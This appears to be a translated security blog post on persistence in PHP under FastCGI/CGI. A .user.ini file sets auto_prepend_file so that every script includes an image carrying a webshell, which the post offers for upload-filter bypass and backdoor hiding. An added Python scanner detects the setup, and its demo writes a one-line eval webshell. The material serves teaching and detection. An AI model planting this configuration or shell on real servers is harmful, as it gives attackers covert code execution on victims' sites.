PHP backdoor built from a .user.ini file
0x00 Background
This is probably something many people consider old hat:
PHP backdoor built from .htaccess files
Let me present a new one: .user.ini. It is more widely applicable than .htaccess. The technique works for PHP running under FastCGI/CGI, whether the web server is nginx, Apache or IIS. My nginx servers all use php-fpm/FastCGI, all my IIS servers with PHP 5.3 and above use FastCGI/CGI, and on Windows I run Apache with fcgi as well, so the scope is very broad, unlike .htaccess, which only applies to Apache.
0x01 .user.ini
So what is .user.ini?
This starts with php.ini. php.ini is PHP's default configuration file and holds many configuration directives. Each directive has one of several changeable modes: PHP_INI_SYSTEM, PHP_INI_PERDIR, PHP_INI_ALL and PHP_INI_USER. The full list of directives and their modes is at http://php.net/manual/zh/ini.list.php; the official explanation of what the modes mean is:
The PHP_INI_USER mode is described as settable from user scripts (via ini_set()), in the Windows registry, and in .user.ini. That is where .user.ini comes in. What is this configuration file? The official documentation explains:
In addition to the main php.ini file, PHP scans for INI files in each directory, starting with the directory of the requested PHP file and working its way up to the current document root (as set in $_SERVER['DOCUMENT_ROOT']). If the PHP file is outside the document root, only its own directory is scanned.
Only INI settings with the modes PHP_INI_PERDIR and PHP_INI_USER are recognized in .user.ini-style INI files.
So .user.ini is effectively a php.ini that the user can "customize": it can set any directive whose mode is PHP_INI_PERDIR or PHP_INI_USER. (PHP_INI_PERDIR is not listed for .user.ini in the table above, but it can be set there too.)
In fact, every mode except PHP_INI_SYSTEM, including PHP_INI_ALL, can be set through .user.ini.
Also unlike php.ini, .user.ini is loaded dynamically: after modifying it there is no need to restart the web server or PHP-FPM. The file is re-read once the interval set by user_ini.cache_ttl (300 seconds by default) has expired.
Looking through php.ini, I was disappointed to find that the even slightly sensitive directives are all PHP_INI_SYSTEM (or php.ini-only), including disable_functions, extension_dir and enable_dl. Still, a "backdoor" can be built very easily with .user.ini.
Two directives in the list are interesting (the first and fourth entries in the manual's table):
auto_prepend_file and auto_append_file. The manual describes them as follows:
auto_prepend_file specifies a file that is automatically parsed before the main file, included as if it had been called with require(). auto_append_file is the same, except the file is parsed after the main file. Usage is very simple; write it directly into .user.ini:
auto_prepend_file=01.gif
01.gif is the file to be included; PHP does not care about its extension.
So with .user.ini we can make every PHP file in that directory "automatically" include a file of our choosing, which can be an ordinary PHP file or an image containing a one-line webshell.
I tested this on IIS 6.0 + FastCGI + PHP 5.3 and on nginx + php-fpm + PHP 5.3. The directory contains .user.ini, 01.gif holding the webshell, and an ordinary echo.php (screenshot of the directory listing):
Accessing echo.php shows the backdoor (screenshot, IIS):
nginx (screenshot):
When is this technique useful? For example, if a site does not let you upload .php files, you can upload a .user.ini and then an image shell to get a shell. The precondition is that the directory containing .user.ini must already hold a normal PHP file, otherwise nothing ever includes the shell. Or, if you just want to hide a backdoor somewhere, this is the most convenient method. Two further conditions follow from the documentation above: PHP must be running under CGI/FastCGI (mod_php does not read .user.ini; it uses .htaccess instead), and user_ini.filename must not have been set to an empty value. Because PHP scans every directory from the script's own directory up to the document root, a .user.ini placed anywhere on that path also affects the script.
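The layout described above, together with the check a defender would run against it, as an added example that is not part of the original post. The script recreates the post's test directory (.user.ini, 01.gif with a one-line shell, echo.php) in a temporary folder using constructed contents, then walks a web root looking for .user.ini files that set auto_prepend_file or auto_append_file, resolves the referenced file, checks whether it carries a PHP open tag, and notes whether the directory holds a .php script at all (the post's precondition). The web root path, the shell body and the parser are assumptions of this example; PHP's own INI parser is not used.

```python
"""Find .user.ini files that prepend/append another file into every PHP script.

Added example, not code from the original post. It builds the post's test
layout in a temp dir (constructed data) and then scans it the way a
defender would scan a real web root.
"""
import os
import re
import tempfile

# Both directives are PHP_INI_PERDIR, so a .user.ini is allowed to set them.
INCLUDE_DIRECTIVES = ("auto_prepend_file", "auto_append_file")
PHP_TAG_RE = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def parse_user_ini(text):
    """Minimal parser for a section-less .user.ini: key = value, ';' comments.

    Double-quoted values are accepted as in php.ini. Section headers are
    skipped rather than honoured, which is enough for this check.
    """
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";[" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip()
        if value.startswith('"'):
            end = value.find('"', 1)
            value = value[1:end] if end > 0 else value[1:]
        else:
            value = value.split(";", 1)[0].strip()   # drop trailing comment
        directives[key.strip().lower()] = value
    return directives


def scan_dir(directory, ini_name=".user.ini"):
    """Return one finding per include directive set in directory/.user.ini."""
    with open(os.path.join(directory, ini_name), encoding="utf-8",
              errors="replace") as fh:
        directives = parse_user_ini(fh.read())
    # Without a real .php script in the directory the include never fires.
    has_php_script = any(n.lower().endswith(".php") for n in os.listdir(directory))
    findings = []
    for name in INCLUDE_DIRECTIVES:
        target = directives.get(name)
        if not target:
            continue
        # Assumption of this example: resolve a relative name against the
        # directory holding the .user.ini.
        path = target if os.path.isabs(target) else os.path.join(directory, target)
        exists = os.path.isfile(path)
        has_tag = False
        if exists:
            with open(path, "rb") as fh:
                has_tag = PHP_TAG_RE.search(fh.read()) is not None
        findings.append({
            "ini": os.path.join(directory, ini_name),
            "directive": name,
            "target": path,
            "exists": exists,
            "has_php_tag": has_tag,
            "has_php_script": has_php_script,
        })
    return findings


def scan_webroot(root, ini_name=".user.ini"):
    """Walk root and collect findings from every .user.ini below it."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        if ini_name in files:
            results.extend(scan_dir(dirpath, ini_name))
    return results


def build_demo_tree():
    """Recreate the post's test directory with constructed sample contents."""
    root = tempfile.mkdtemp(prefix="userini-demo-")
    with open(os.path.join(root, ".user.ini"), "w") as fh:
        fh.write("; constructed example\nauto_prepend_file=01.gif\n")
    with open(os.path.join(root, "01.gif"), "wb") as fh:
        # GIF magic followed by a one-line shell: the "image shell" pattern.
        fh.write(b"GIF89a<?php @eval($_POST['x']); ?>")
    with open(os.path.join(root, "echo.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    return root


if __name__ == "__main__":
    for f in scan_webroot(build_demo_tree()):
        flag = "BACKDOOR" if f["has_php_tag"] and f["has_php_script"] else "check"
        print(flag, f["ini"], f["directive"], "->", f["target"])
```

Run it against a real document root instead of the demo tree to list every .user.ini that injects code; a target that exists, contains a PHP tag and sits next to a real .php script matches exactly the setup the post describes.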
0x02 References
http://php.net/manual/zh/ini.list.php
http://php.net/manual/zh/configuration.changes.modes.php
http://php.net/manual/zh/configuration.file.per-user.php
http://php.net/manual/zh/configuration.changes.php